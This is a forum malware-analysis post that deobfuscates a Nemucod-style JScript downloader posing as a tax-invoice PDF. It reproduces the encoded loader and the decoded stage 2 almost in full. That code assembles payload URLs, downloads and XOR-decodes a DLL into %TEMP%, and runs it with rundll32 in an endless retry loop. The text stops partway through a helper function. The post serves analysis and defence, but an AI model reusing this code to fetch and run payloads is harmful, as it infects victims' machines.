Malware Analysis Deobfuscation of script samples from MV 13-9-16 #4 (nemucod and cie)

DardiM

https://malwaretips.com/threads/13-9-16-4.63346/
(thanks to @Solarquest)

There are 3 samples that use scripts :

2 .js
3 tax_invoice_scan_PDF.B6B845F6.js
4 d7f8c742cd.html

3 and 4 are similar to
(remember, I received one wave with insults inside :) ):


2 .js is similar to :




PART 1 : tax_invoice_scan_PDF.B6B845F6.js

1) What it looks like when edited

// Stage-1 loader of tax_invoice_scan_PDF.B6B845F6.js (listing elided with "..." by the post author).
// EIj holds the whole stage-2 script encoded as one '~'-separated string of token names; split('~')
// turns it into an array of keys that are looked up in the Ar table further down. With that table the
// first tokens (__WYz __Rv __JXr __GZj __SSy __Qx __Ks __JXr __Ea __FIn __Dx __UVj __Ea __EBl __Se)
// read "function e() {\n", i.e. the start of the decoded listing shown in section 3.
var EIj = "__WYz~__Rv~__JXr~__GZj~__SSy~__Qx~__Ks~__JXr~__Ea~__FIn~__Dx~__UVj~__EBl~__Se~__Ea~__Ea~__Ea~__Ea~__HAb~__Tn~__EBs~__Ea~__Zq~__Lm~__Rl~__Qx~__Yb~__Rv~__Jy~__Oc~__WYz~__Rv~__Rl~__SSy~__Jy~__Oc~__Ea~__Yw~__Ea~__Qt~__Uf~__CQq~__Qt~__Vs~__Qt~__Qt~__Vs~__Qt~__GZj~__Qt~__Vs~__Qt~__EBs~__Qt~__Vs~__Qt~__Qx~__Qt~__Vs~
...
...
__Ea~__Dc~__Au~__Ge~__UVj~__Ea~__De~__Se~__Gx~__Gx~__Gx~__EBl~__St~__Gf~__Il~__FSz~__Yw~__QFr~__SSy~__Jc~__HTm~__KGb~__De~__Se~__Gx~__Gx~__FIn~__ULh~__Rl~__FIn~__Ea~__De~__Se~__Gx~__Gx~__Gx~__EBl~__St~__Gf~__Il~__FSz~__Yw~__Sh~__Qx~__Jc~__VEi~__QFr~__SSy~__Jc~__Wq~__HTm~__KGb~__De~__Se~__Gx~__Gx~__Sh~__Rv~__TDz~__TKe~__Rv~__Rl~__Lm~__Dx~__CQq~__SSy~__EBs~__Qx~__JXr~__Oc~__VEi~__DOy~__LGt~__Gp~__IDo~__Ea~__Vs~__Ea~__Ex~__Yr~__Rv~__Ea~__Vs~__Ea~__ITu~__Bi~__Tn~__FCk~__Wq~__Dx~__St~__Gf~__Il~__FSz~__UVj~__UVj~__HTm~__De~__Se~__Gx~__KGb~__De~__Se~__Gx~__De~__Se~__Gx~__Ex~__JXr~__Au~__Yw~__Sh~__Rv~__VEi~__Js~__CYg~__HAb~__Wk~__Wq~__Dx~__Qt~__Qt~__UVj~__HTm~__De~__Se~__Gx~__De~__Se~__Gx~__EBs~__FIn~__SSy~__Rv~__EBs~__JXr~__Ea~__Ex~__JXr~__Au~__HTm~__De~__Se~__KGb~__HTm~__De~__Se~__De~__Se".split('~');

// Fh accumulates the decoded stage-2 source, one character per token.
var Fh = "";
// Token -> character table. Every value is a comma expression, so (1, "\x0a") evaluates to its last
// operand "\x0a"; the leading 1 is noise. The table covers the ASCII letters, digits and punctuation
// the decoded script needs plus tab (\x09), LF (\x0a) and CR (\x0d).
var Ar = {
"__Se": (1, "\x0a"),
"__De": (1, "\x0d"),
"__CXb": (1, "D"),
"__GVc": (1, "H"),
"__Js": (1, "L"),
"__LGt": (1, "P"),
"__Jt": (1, "T"),
"__Bi": (1, "X"),
"__Gx": (1, "\x09"),
"__Jy": (1, "d"),
"__Lm": (1, "h"),
"__ULh": (1, "l"),
"__TKe": (1, "p"),
"__SSy": (1, "t"),
"__KGb": (1, "\x7d"),
"__KVp": (1, "\x7c"),
"__EBl": (1, "\x7b"),
"__Aj": (1, "\x2f"),
"__SYo": (1, "\x2d"),
"__TDz": (1, "\x2e"),
"__Vs": (1, "\x2b"),
"__TYm": (1, "\x2c"),
"__By": (1, "\x2a"),
"__CYg": (1, "C"),
"__Ex": (1, "G"),
"__DOy": (1, "K"),
"__SVx": (1, "O"),
"__CQq": (1, "S"),
"__Wy": (1, "\x25"),
"__Qt": (1, "\x22"),
"__Uf": (1, "W"),
"__Il": (1, "x"),
"__Dx": (1, "\x28"),
"__UVj": (1, "\x29"),
"__GZj": (1, "c"),
"__Oc": (1, "g"),
"__XEs": (1, "k"),
"__Ks": (1, "o"),
"__Rl": (1, "s"),
"__PAb": (1, "w"),
"__Ea": (1, "\x20"),
"__Yy": (1, "\x21"),
"__Dc": (1, "\x31"),
"__SJu": (1, "\x30"),
"__FSz": (1, "\x33"),
"__Au": (1, "\x32"),
"__Jc": (1, "\x35"),
"__IDo": (1, "\x34"),
"__Wk": (1, "\x37"),
"__VQt": (1, "\x36"),
"__FCk": (1, "\x39"),
"__Ge": (1, "\x38"),
"__Yd": (1, "\x3a"),
"__Uw": (1, "\x3c"),
"__HTm": (1, "\x3b"),
"__EUx": (1, "\x3e"),
"__Yw": (1, "\x3d"),
"__ITu": (1, "F"),
"__AKo": (1, "J"),
"__QFr": (1, "N"),
"__Nv": (1, "R"),
"__Sh": (1, "V"),
"__Id": (1, "Z"),
"__ZNc": (1, "b"),
"__TSe": (1, "\x40"),
"__WYz": (1, "f"),
"__Xg": (1, "j"),
"__JXr": (1, "n"),
"__EBs": (1, "r"),
"__HAb": (1, "v"),
"__TTk": (1, "z"),
"__Gf": (1, "B"),
"__Rv": (1, "u"),
"__WFm": (1, "A"),
"__ZIf": (1, "E"),
"__St": (1, "I"),
"__OPd": (1, "M"),
"__Oe": (1, "Q"),
"__Yr": (1, "U"),
"__QGw": (1, "Y"),
"__Tn": (1, "a"),
"__FIn": (1, "e"),
"__Qx": (1, "i"),
"__Ph": (1, "m"),
"__Gp": (1, "q"),
"__Zq": (1, "\x5f"),
"__La": (1, "\x5e"),
"__Wq": (1, "\x5d"),
"__Hm": (1, "\x5c"),
"__VEi": (1, "\x5b"),
"__Yb": (1, "y")
};

// Decoding loop: for every token in EIj append the mapped character to Fh.
var Tg;
// EIj["l" + "e" + "n" + "g" + "th"] is just EIj.length with the property name split up
// (presumably to defeat naive string matching on the file).
for (Tg = 0; Tg < EIj["l" + "e" + "n" + "g" + "th"]; Tg++) {
// GWu is assigned without var, so it becomes an implicit global.
GWu = EIj[Tg];
// Comma operator again: (43, 35, Fh) is Fh and (25, 35, Ar[GWu]) is Ar[GWu].
Fh = (43, 35, Fh) + (25, 35, Ar[GWu]);
}

// Runs the decoded stage 2 (section 3 below). For analysis, the decoded text is recovered by
// capturing Fh instead of evaluating it.
eval(Fh);

2) Explanations :

var EIj = " .........................".split('~');

=> A tab (array) built from the string, split at each '~' character.
=> A tab of small strings

__WYz
__Rv
__JXr
__GZj
__SSy
__Qx
etc,..

var Fh = "";

=> used to accumulate the first deobfuscated string of code
var Ar = {
"__Se": (1, "\x0a"),
"__De": (1, "\x0d"),

...
...
};

=> used as a character-replacement table

var Tg;

=> index for the for loop

for (Tg = 0; Tg < EIj["l" + "e" + "n" + "g" + "th"]; Tg++) {
GWu = EIj[Tg];
Fh = (43, 35, Fh) + (25, 35, Ar[GWu]);
}

=> can be written in a simplified way :


for (Tg = 0; Tg < EIj.length ; Tg++) {

GWu = EIj[Tg];
Fh = Fh + Ar[GWu]);
}

=> a loop over each element of the first tab; each value is used as a key to retrieve the real character from the second tab.


Example :

GWu = EIj[0];

=> __WYz

this key is looked up in the second tab: Ar[GWu]

=> "__WYz": (1, "f"), <=> key: value

the way it is written in the second tab is just a bit more obfuscation: the comma operator evaluates to its last operand, so (1, "f") => "f"

So each __WYz corresponds to an "f"
Fh = Fh + Ar[GWu]);

=> concatenation / build of the "real part", stored in the Fh var
Example : the first chars : "function e()"

eval(Fh);

=> the string built by the loop and stored in the var Fh is evaluated => the functions linked to the real infection are run.


3) What it looks like after first deobfuscation :


// Decoded stage 2 starts with an environment check that runs before anything else.
function e() {
// _hsiyudgfustdg = "WScript"
var _hsiyudgfustdg = "WS" + "" + "c" + "r" + "i" + "pt";
// _c = "%SystemRoot%\system32\cmd.exe" ("\%" is just "%" in a JScript string literal).
var _c = "\%Sy" + "st" + "" + "em" + "Root\%\\s" + "ystem32\\cmd." + "ex" + "e";
// WScript.CreateObject("WScript.Shell")
var _87867t67t6gt = this[_hsiyudgfustdg]["Cre"+"ateOb"+"ject"](_hsiyudgfustdg+".She"+"ll");
// SYSTEM environment collection, then its ComSpec variable.
var _87g6sd5fg = _87867t67t6gt["En" + "vi" + "" + "ron" + "men" + "t"]("SY" + "S" + "T" + "E" + "M");
var _dd = _87g6sd5fg("Com" + "S" + "" + "pe" + "c");
// Continue only when ComSpec is the standard cmd.exe path; otherwise quit with exit code 1
// (looks like a sandbox/emulator check; the script itself does not say why).
if (_dd == _c) {
return 1;
} else {
// NOTE(review): this["_hsiyudgfustdg"] reads a global of that name, but _hsiyudgfustdg is a local
// var here, so this[undefined]["Quit"] is what this line actually evaluates - either an original
// quirk or one of the author's deliberate modifications mentioned below the listing.
this[this["_hsiyudgfustdg"]]["Qui" + "" + "t"](1);
};
}

e();


// Stage 2 keeps every property/method name, ProgID and string constant in small pieces and glues
// them at the use sites ("len" + "gth", "Creat" + "eObje" + "ct", ...). The trailing + "" is a
// no-op. Several names are defined more than once under different variable names; only some of
// the copies are referenced in the visible code. Resolved values are noted on the groups below.
// LCv7 = "join"; KPq4 + GUu + FXa9 = "fromCharCode" (used in St).
var LCv7 = "join" + "";
var FXa9 = "Code" + "";
var GUu = "har" + "";
var KPq4 = "fromC" + "";
var XQg1 = "ngth" + "";
var QLf = "le" + "";
var PVc6 = "close" + "";
var UEs = "le" + "";
var Oc = "ToFi" + "";
var Sr = "Save" + "";
var Zp5 = "Text" + "";
// Ia + Zp5 = "writeText" (used in OMb).
var Ia = "write" + "";
var Oy1 = "open" + "";
var QGo = "et" + "";
var MHl3 = "Chars" + "";
var Fd9 = "type" + "";
var NKk = "am" + "";
var St1 = "Stre" + "";
// Tn8 + Nl9 + Zm + TSw + St1 + NKk = "ADODB.Stream"; REk + Kk7 + MJt = "CreateObject".
var TSw = "DB." + "";
var Zm = "O" + "";
var Nl9 = "D" + "";
var Tn8 = "A" + "";
var MJt = "ct" + "";
var Kk7 = "eObje" + "";
var REk = "Creat" + "";
// BUj = "push"; Ar5 + DOz + XUy3 = "charCodeAt" (used in IGi2).
var BUj = "push" + "";
var XUy3 = "eAt" + "";
var DOz = "Cod" + "";
var Ar5 = "char" + "";
var Iw = "gth" + "";
var Va = "len" + "";
var PGi5 = "ose" + "";
var EPt8 = "cl" + "";
// Sp3 + WGl5 = "ReadText"; Uc + YWz + Yz0 + YRr3 = "LoadFromFile" (used in HIi).
var WGl5 = "Text" + "";
var Sp3 = "Read" + "";
var YRr3 = "mFile" + "";
var Yz0 = "ro" + "";
var YWz = "dF" + "";
var Uc = "Loa" + "";
var OCv5 = "n" + "";
var FJh = "ope" + "";
// Ci6 + Jw + Nr9 = "Charset".
var Nr9 = "t" + "";
var Jw = "rse" + "";
var Ci6 = "Cha" + "";
var XOr5 = "type" + "";
var DJb6 = "am" + "";
var Ck = ".Stre" + "";
var YSr = "DB" + "";
var Lv2 = "O" + "";
var Vf = "D" + "";
var BFq6 = "A" + "";
var Oo2 = "ect" + "";
var BBi = "bj" + "";
var NRe5 = "ateO" + "";
var Jn3 = "Cre" + "";
var WXl8 = "h" + "";
var Yq0 = "lengt" + "";
var Lc0 = "ngth" + "";
var Wz = "le" + "";
// Ea0 + Re = "splice" (used in Kx1).
var Re = "ice" + "";
var Ea0 = "spl" + "";
var JRe = "th" + "";
var JPf2 = "leng" + "";
var UKa = "th" + "";
var ECj5 = "leng" + "";
var JAu = "gth" + "";
var Lx = "len" + "";
var YBc = "th" + "";
var ZDn6 = "leng" + "";
var Kj = "th" + "";
var Oj = "leng" + "";
var Rs = "ep" + "";
var CNo5 = "Sle" + "";
// Eg + Pv3 + Cg + Pa + Yg1 = ",qwerty 323" (rundll32 argument); Aw6 = " "; TFn + NKm = "Run".
var Yg1 = "23" + "";
var Pa = " 3" + "";
var Cg = "ty" + "";
var Pv3 = "er" + "";
var Eg = ",qw" + "";
var Aw6 = " " + "";
var NKm = "n" + "";
var TFn = "Ru" + "";
var Ir = "th" + "";
var Kp = "leng" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
// Zg0 + Bs5 = "close"; Cf3 + CKl8 + He + St0 = "SaveToFile"; Ym + WMi = "position".
var Bs5 = "ose" + "";
var Zg0 = "cl" + "";
var St0 = "e" + "";
var He = "Fil" + "";
var CKl8 = "veTo" + "";
var Cf3 = "Sa" + "";
var WMi = "ion" + "";
var Ym = "posit" + "";
// PAw1 + XTy + ZYz + SKa9 = "ResponseBody"; DQq + Js = "write"; TGb7 = "type"; RXm8 = "open".
var SKa9 = "dy" + "";
var ZYz = "Bo" + "";
var XTy = "nse" + "";
var PAw1 = "Respo" + "";
var Js = "ite" + "";
var DQq = "wr" + "";
var TGb7 = "type" + "";
var RXm8 = "open" + "";
// Hz + EJz + Vm6 + OPp + Ba1 + ZJo = "ADODB.Stream"; HHk + EBq9 + KUa = "CreateObject".
var ZJo = "eam" + "";
var Ba1 = "Str" + "";
var OPp = "DB." + "";
var Vm6 = "O" + "";
var EJz = "D" + "";
var Hz = "A" + "";
var KUa = "ject" + "";
var EBq9 = "eOb" + "";
var HHk = "Creat" + "";
// CPi = "Sleep"; Yp + Sy3 = "send"; YPc + Gg = "GET"; DFa = "open".
var CPi = "Sleep" + "";
var Sy3 = "d" + "";
var Yp = "sen" + "";
var Po = "th" + "";
var NXj9 = "leng" + "";
var Gg = "T" + "";
var YPc = "GE" + "";
var DFa = "open" + "";
var TYr1 = "ngth" + "";
var Cl1 = "le" + "";
// Pi9 = "Quit"; DAn2 + FXo = "WScript"; Vn1 + Qb8 + YIa and Te2 + LLv + Lp = "FileExists";
// Hs + Yu = ".txt".
var Pi9 = "Quit" + "";
var FXo = "cript" + "";
var DAn2 = "WS" + "";
var YIa = "xists" + "";
var Qb8 = "leE" + "";
var Vn1 = "Fi" + "";
var Yu = "xt" + "";
var Hs = ".t" + "";
var Lp = "sts" + "";
var LLv = "eExi" + "";
var Te2 = "Fil" + "";
// WHr0 + HHy + JRt8 + Qc0 + DVr + VTi + YHq9 = "Scripting.FileSystemObject";
// XHv + MRa + DCx = "CreateObject"; IOi + Kl + QUd3 = "length".
var YHq9 = "ject" + "";
var VTi = "mOb" + "";
var DVr = "te" + "";
var Qc0 = "Sys" + "";
var JRt8 = ".File" + "";
var HHy = "ting" + "";
var WHr0 = "Scrip" + "";
var DCx = "ct" + "";
var MRa = "eObje" + "";
var XHv = "Creat" + "";
var QUd3 = "h" + "";
var Kl = "gt" + "";
var IOi = "len" + "";
// Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5 = "WinHttp.WinHttpRequest.5.1";
// LCo + Bp + Ty0 + IVz + Jm1 = "MSXML2.XMLHTTP" (the two HTTP ProgIDs tried in Zm6).
var DFe5 = "t.5.1" + "";
var Nq0 = "eques" + "";
var Sz9 = "pR" + "";
var Yu8 = "tt" + "";
var OJe1 = "WinH" + "";
var EMb = "ttp." + "";
var Mu = "WinH" + "";
var Jm1 = "P" + "";
var IVz = "MLHTT" + "";
var Ty0 = "2.X" + "";
var Bp = "ML" + "";
var LCo = "MSX" + "";
// FAt8 + IZr = "floor" (Math.floor in random()).
var IZr = "or" + "";
var FAt8 = "flo" + "";

// The two candidate rundll32.exe paths; the PROCESSOR_ARCHITECTURE check further down picks the
// SysWOW64 (32-bit) copy on amd64 and the system32 copy otherwise to run the downloaded dll.
var YZa3 = "%SystemRoot%\\system32\\rundll32.exe" + "";
var ZUi4 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";

// Cd + Jz + GNu0 + DSl + LGx0 + Vn0 = "PROCESSOR_ARCHITECTURE"; KPm + Nu = "System".
// QNu and ZEn2 ("amd64" in pieces) are not used - the literal "amd64" is compared instead.
var QNu = "d64" + "";
var ZEn2 = "am" + "";
var Vn0 = "RE" + "";
var LGx0 = "TECTU" + "";
var DSl = "RCHI" + "";
var GNu0 = "R_A" + "";
var Jz = "CESSO" + "";
var Cd = "PRO" + "";
var Nu = "tem" + "";
var KPm = "Sys" + "";
// Dc + Ay1 = ".dll"; Ri6 + TPc8 + DXl1 + Ag = "VfqAQwQEZPrY" (drop file name); Nz + OPo = "%TEMP%/".
var Ay1 = "ll" + "";
var Dc = ".d" + "";
var Ag = "rY" + "";
var DXl1 = "EZP" + "";
var TPc8 = "wQ" + "";
var Ri6 = "VfqAQ" + "";
var OPo = "P%/" + "";
var Nz = "%TEM" + "";
// LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"; MOq + Lf4 + Xf0 = "CreateObject".
var Tp7 = "ll" + "";
var PVg7 = ".She" + "";
var OHb = "pt" + "";
var Fk = "ri" + "";
var LSk = "WSc" + "";
var Xf0 = "ect" + "";
var Lf4 = "eObj" + "";
var MOq = "Creat" + "";
// Fragments of the five download URLs assembled in TIk below; the post resolves them in
// section 4-2 (note the last two entries build the same URL).
var Lc = "gb" + "";
var Ty = "gn" + "";
var QNd = "72" + "";
var Td = "om/f" + "";
var VPw3 = "y.c" + "";
var QXr = "ym" + "";
var Ik = "eh" + "";
var Zn1 = "il" + "";
var DVp = "m" + "";
var AZz = "/s" + "";
var Hl = ":/" + "";
var PDr = "http" + "";
var Ze8 = "ngb" + "";
var RHj = "/f72g" + "";
var UOz = "m" + "";
var Pu9 = "co" + "";
var LLy5 = "y." + "";
var IGq = "hym" + "";
var Cn = "ile" + "";
var MQh7 = "sm" + "";
var NHe3 = "/" + "";
var FAi2 = ":/" + "";
var AYh4 = "tp" + "";
var Ur8 = "ht" + "";
var Dn5 = "t" + "";
var VHj4 = "m1" + "";
var NZa2 = "b9" + "";
var TKb3 = "m/" + "";
var Vc2 = "o" + "";
var MEw1 = ".c" + "";
var YXv5 = "id" + "";
var Ak = "elr" + "";
var Po3 = "u" + "";
var QSu = "/d" + "";
var Ow4 = ":/" + "";
var WBq = "p" + "";
var ZCl = "htt" + "";
var Ls4 = "gk" + "";
var Dr = "d7" + "";
var Dq = "ds" + "";
var AGi8 = "om/" + "";
var LMc = "y.c" + "";
var Tv = "ur" + "";
var RHg6 = "dzeb" + "";
var Hu1 = "/a" + "";
var Rf = ":/" + "";
var SQk2 = "tp" + "";
var TAh2 = "ht" + "";
var Ta1 = "3ib4f" + "";
var Ad8 = "/e" + "";
var Gg2 = "et" + "";
var OIy = ".n" + "";
var DFt2 = "en" + "";
var HTq6 = "ay" + "";
var Za = "yd" + "";
var Tp6 = "://ma" + "";
var EQm1 = "tp" + "";
var LYu = "ht" + "";
var RUp6 = "437" + "";
// ZJb + Av = "length" - the form used throughout the rest of the script.
var HAj = "th" + "";
var GZc = "ng" + "";
var Yq = "le" + "";
// Runs of "5" plus a few junk words ("sfd", "dfa", "asfas", "132", "1123"): their only visible use
// is to derive numbers from string lengths (see Xl3 / ELs below).
var YRz = "5" + "";
var Vo3 = "55" + "";
var HEk4 = "5555" + "";
var Pm2 = "5555" + "";
var OXa = "55555" + "";
var PAj0 = "5555" + "";
var Sq = "55" + "";
var Wh8 = "55" + "";
var AGf5 = "555" + "";
var ZIv = "555" + "";
var Ht4 = "55555" + "";
var Pe = "55555" + "";
var FLt = "5555" + "";
var JFt3 = "55555" + "";
var NRs4 = "55555" + "";
var Dm = "sfd" + "";
var Kh = "dfa" + "";
var Wm7 = "asfas" + "";
var Vc = "th" + "";
var Yf = "leng" + "";
var CTd5 = "55555" + "";
var Av = "gth" + "";
var ZJb = "len" + "";
var Bl8 = "5555" + "";
var Hg = "55555" + "";
var IOu = "5555" + "";
var KHx = "55" + "";
var Sd = "55" + "";
var QFz9 = "55555" + "";
var Bq = "5555" + "";
var Tz9 = "132" + "";
var Ai = "1123" + "";
// Comma operator: Xl3 is the second operand, a string of 26 "5"s (4+5+2+2+4+5+4); ELs = 26.
// ELs is the seed of the checksum computed in Kx1.
var Xl3 = (Ai + Tz9, Bq + QFz9 + Sd + KHx + IOu + Hg + Bl8);
var ELs = Xl3[ZJb + Av];
// NQf6 / Nf and SPz0 / QAl8 are computed the same way but are not referenced in the visible code.
var NQf6 = (CTd5);
// Seed table of the "random" keystream generator: copied by the main loop (URL choice) and by Kx1
// (XOR decoding).
var Uw = [18807, 7552, 23965];
var Nf = NQf6[ZJb + Av];
var SPz0 = (Wm7 + Kh + Dm, NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz);
var QAl8 = SPz0[ZJb + Av];
// ADODB.Stream constants: XWe = 1 (adTypeBinary), DAb4 = 2 (adTypeText),
// GLq = 2 (adSaveCreateOverWrite). MBi0 = "437" is the Charset used for the text-mode reads/writes.
var XWe = 1;
var DAb4 = 2;
var GLq = 2;
var MBi0 = "437";
// The five payload URLs (resolved in section 4-2 of the post).
var TIk = [LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1, TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5, TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8, TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc];
// MTm6 = WScript.CreateObject("WScript.Shell"); Io = expanded "%TEMP%/".
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);
var Io = MTm6.ExpandEnvironmentStrings(Nz + OPo);
// Lp9 = "%TEMP%/VfqAQwQEZPrY" (raw download, no extension); IVi2 = Lp9 + ".dll" (decoded payload).
var Lp9 = Io + Ri6 + TPc8 + DXl1 + Ag;
var IVi2 = Lp9 + Dc + Ay1;
// Ww = MTm6.Environment("System"); pick the rundll32 path by PROCESSOR_ARCHITECTURE.
var Ww = MTm6.Environment(KPm + Nu);
if (Ww(Cd + Jz + GNu0 + DSl + LGx0 + Vn0).toLowerCase() == "amd64") {

var ENa6 = MTm6.ExpandEnvironmentStrings(ZUi4);
} else {
var ENa6 = MTm6.ExpandEnvironmentStrings(YZa3);
}

// Keystream generator. Despite the name nothing inside is random: the multiplier/modulus pairs
// (171/30269, 172/30307, 170/30323) are the Wichmann-Hill PRNG constants and the state array s is
// updated in place, so a fixed seed always produces the same sequence. That is what lets the script
// (and an analyst) reproduce the XOR keystream used in Kx1.
//   range: upper bound of the result, which lies in [0, range)
//   s:     3-element state array, mutated on every call
function random(range, s) {

// Arithmetic obfuscation: s[-6915 + 6915] is s[0], 5745 - 5573 is 172, s[4353 - 4352] is s[1].
s[0] = 171 * s[-6915 + 6915] % 30269;
s[1] = (5745 - 5573) * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[4353 - 4352] / 30307 + s[2] / 30323) % 1.0;
// Math[FAt8 + IZr] is Math.floor.
return Math[FAt8 + IZr](r * range);
}

// Zm6 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"]: try CreateObject on each ProgID and keep
// the first one that succeeds in Ma6. If both throw, Ma6 stays undefined and every use of it in
// the main loop raises inside that loop's try/catch, which just sleeps and retries.
var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];

for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {

try {
var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}
};

// Main download / decode / execute loop (the "infinite" do..while the post highlights).
var El = "";
// new ActiveXObject("Scripting.FileSystemObject")
var fso = new ActiveXObject(WHr0 + HHy + JRt8 + Qc0 + DVr + VTi + YHq9);
// WBe is a copy of the seed table whose first element is replaced by a genuinely random value, so
// only the URL choice below is unpredictable; the XOR keystream in Kx1 starts from the untouched Uw.
var WBe = Uw.slice();
WBe[0] = Math.random() * 29999 | 0;
// Em: 0 until the payload has been downloaded, decoded and written to disk; 1 afterwards.
var Em = 0;
do {

// If the dll exists and a marker file "<8.3 short path>.txt" exists as well, quit
// (fso.FileExists / GetFile / ShortPath; Hs + Yu is ".txt"). What creates the .txt is not visible
// here - presumably the payload.
if (fso[Te2 + LLv + Lp](IVi2)) {
var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;
El = Lj4 + Hs + Yu;
if (fso[Te2 + LLv + Lp](El )) {
// this["WScript"]["Quit"](0)
this[DAn2 + FXo][Pi9](0);
}
}
try {
if (0 == Em) {
// NOTE(review): random_ is not defined anywhere in the listing - the function above is named
// random. This matches the author's stated deliberate edits to keep the sample from running when
// copy-pasted. Gr is recomputed on every retry from the mutated WBe state, so the post-increment
// below has no lasting effect; the state mutation is what moves the URL index between attempts.
var Gr = random_(TIk[ZJb + Av], WBe);
// Ma6.open("GET", TIk[Gr % TIk.length], false) - synchronous request - then Ma6.send().
Ma6[DFa](YPc + Gg, TIk[Gr++ % TIk[ZJb + Av]], false);
Ma6[Yp + Sy3]();
// Poll readystate until 4 (complete), WScript.Sleep(100) between polls (6 * 16 + 4 is 100).
while (Ma6.readystate < (1 * 4)) WScript[CPi](6 * 16 + 4);
// ADODB.Stream in binary mode (XWe = 1): write ResponseBody, rewind, SaveToFile(Lp9, GLq = 2,
// overwrite), close. Lp9 is "%TEMP%/VfqAQwQEZPrY" with no extension (section 4-3).
var UFn4 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
UFn4[DFa]();
UFn4[TGb7] = XWe;
UFn4[DQq + Js](Ma6[PAw1 + XTy + ZYz + SKa9]);
UFn4[Ym + WMi] = 0;
UFn4[Cf3 + CKl8 + He + St0](Lp9 , GLq);
UFn4[Zg0 + Bs5]();
// HIi re-reads the file as CP437 text and maps it back to a byte array; Kx1 XOR-decodes it and
// checks the trailing checksum, returning [] on mismatch.
var JEc3 = HIi(Lp9 );
JEc3 = Kx1(JEc3);
// Accept only 102400..235520 bytes ((2703 - 2603) * 1024 .. (74 * 3 + 8) * 1024); anything else,
// including the [] from a failed checksum, goes back to the while (1) and retries.
if (JEc3[ZJb + Av] < (2703 - 2603) * 1024 || JEc3[ZJb + Av] > (74 * 3 + 8) * 1024) {
continue;
}
// OMb writes the decoded bytes to the .dll path IVi2.
OMb(IVi2, JEc3);
Em = 1;
}
// MTm6.Run("<rundll32 path> <8.3 short path>,qwerty 323"): Aw6 is " ", Eg + Pv3 + Cg + Pa + Yg1 is
// ",qwerty 323". Repeated every 20 s until the marker-file check at the top quits the script.
var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;
MTm6[TFn + NKm](ENa6 + Aw6 + Lj4 + Eg + Pv3 + Cg + Pa + Yg1);
WScript.Sleep(20000);
} catch (e) {
// Any failure (no HTTP object, network or file error): WScript.Sleep(1000) and retry forever.
WScript[CPi](1000);
continue;
};
} while (1);
// Unreachable: the loop has no break; the script only ends through the Quit call above.
WScript.Quit(0);

// Decodes the downloaded payload: XOR with the reproducible keystream, then verify a 4-byte
// checksum trailer. Returns the decoded byte array, or [] when the checksum does not match.
//   IGv7: byte array produced by HIi/IGi2; modified in place
function Kx1(IGv7) {
var Fm;
// Fresh copy of the fixed seed [18807, 7552, 23965]: the keystream is identical on every run.
var AJf = Uw.slice();
// 6780 - 6780 is 0. Each byte is XORed with the next keystream value in [0, 256).
for (var OPr3 = 6780 - 6780; OPr3 < IGv7[ZJb + Av]; OPr3++) {
IGv7[OPr3] ^= random(256, AJf);
}
// Expected checksum: the last four bytes, little-endian.
var Yz = IGv7[IGv7[ZJb + Av] - 4] | IGv7[IGv7[ZJb + Av] - 3] << 8 | IGv7[IGv7[ZJb + Av] - 2] << 16 | IGv7[IGv7[ZJb + Av] - 1] << 24;
// Ea0 + Re is "splice": drop the trailer. Note it reads the length of the global JEc3 (declared in
// the main loop) rather than IGv7; at the only call site both refer to the same array.
IGv7[Ea0 + Re](JEc3[ZJb + Av] - 4, 4);
// Running byte sum seeded with ELs (26, the length of the "5" string defined earlier), mod 1e9.
Fm = ELs;
for (var OPr3 = 0; OPr3 < IGv7[ZJb + Av]; OPr3++) {

Fm = (Fm + IGv7[OPr3]) % 1000000000;
};
if (Fm != Yz) {
return [];
};
return IGv7;
};

// Reads a file through ADODB.Stream in text mode with Charset "437" and returns its content as a
// byte array (IGi2 undoes the CP437 text decoding).
//   IDz0: path of the raw downloaded file
function HIi(IDz0) {

// WScript.CreateObject("ADODB.Stream"); type = DAb4 (2, adTypeText); Charset = MBi0 ("437").
var CJf2 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
CJf2[TGb7] = DAb4;
CJf2[Ci6 + Jw + Nr9] = MBi0;
CJf2[DFa]();
// open(); LoadFromFile(IDz0); ReadText; close()
CJf2[Uc + YWz + Yz0 + YRr3](IDz0);
var Nq = CJf2[Sp3 + WGl5];
CJf2[Zg0 + Bs5]();
return IGi2 (Nq);
};

// Converts the CP437-decoded text back into the original bytes: characters below 128 are kept,
// the others are mapped through HFw3 (Unicode code point of a CP437 glyph -> byte 128..255).
//   MOk3: string returned by ADODB.Stream.ReadText with Charset 437
// Returns an array of byte values.
function IGi2 (MOk3) {

// Sparse array used as a map. Keys are Unicode code points, values CP437 byte values; many of them
// are written as arithmetic (12 * 21 = 252 = U+00FC "ü" -> 129, 8816 - 8565 = 251 -> 150, ...).
var HFw3 = new Array();
HFw3[199] = 128;
HFw3[12 * 21] = -9198 + 9327;
